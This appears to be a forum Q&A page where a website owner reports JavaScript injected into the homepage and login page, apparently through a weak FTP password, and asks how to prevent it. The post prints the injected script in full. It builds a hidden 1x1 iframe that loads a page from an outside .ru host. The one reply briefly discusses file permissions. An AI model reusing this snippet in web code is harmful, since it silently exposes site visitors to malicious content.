Home/ Questions/Q 9060209
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-06-16T15:10:03+00:00

Today morning I have noticed that some Javascript has been added to my hosted

  • 0

Today morning I have noticed that some Javascript has been added to my hosted site . When I downloaded the homepage the code was like
<!--04b037--><script type="text/javascript"language="javascript"> (function () { var ipexz = document.createElement('iframe'); ipexz.src = 'http://nypmivhy.ru/count5.php'; ipexz.style.position = 'absolute'; ipexz.style.border = '0'; ipexz.style.height = '1px'; ipexz.style.width = '1px'; ipexz.style.left = '1px'; ipexz.style.top = '1px'; if (!document.getElementById('ipexz')) { document.write('<div id=\'ipexz\'></div>'); document.getElementById('ipexz').appendChild(ipexz); }})();</script><!--/04b037-->
And in login page :

(function () { var usyux = document.createElement('iframe'); usyux.src = 'http://nypmivhy.ru/count5.php'; usyux.style.position = 'absolute'; usyux.style.border = '0'; usyux.style.height = '1px'; usyux.style.width = '1px'; usyux.style.left = '1px'; usyux.style.top = '1px'; if (!document.getElementById('usyux')) { document.write('
'); document.getElementById('usyux').appendChild(usyux); }})();" method="post"> Email

I guess its a virus/spam attack. Though I removed the javascript code now, I want to how can I prevent my site from such attacks. NB: My FTP password is very weak.

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    Check the permissions of the file is correct otherwise it could be the code was injected.

    Take a look at this:

    http://ag.arizona.edu/ecat/web/permissions.html

    There are 3 main permissions that you have to setup for the files:

    read from the file
write to the file
execute the file

    Here is a summary for permissions

    enter image description here

    • 0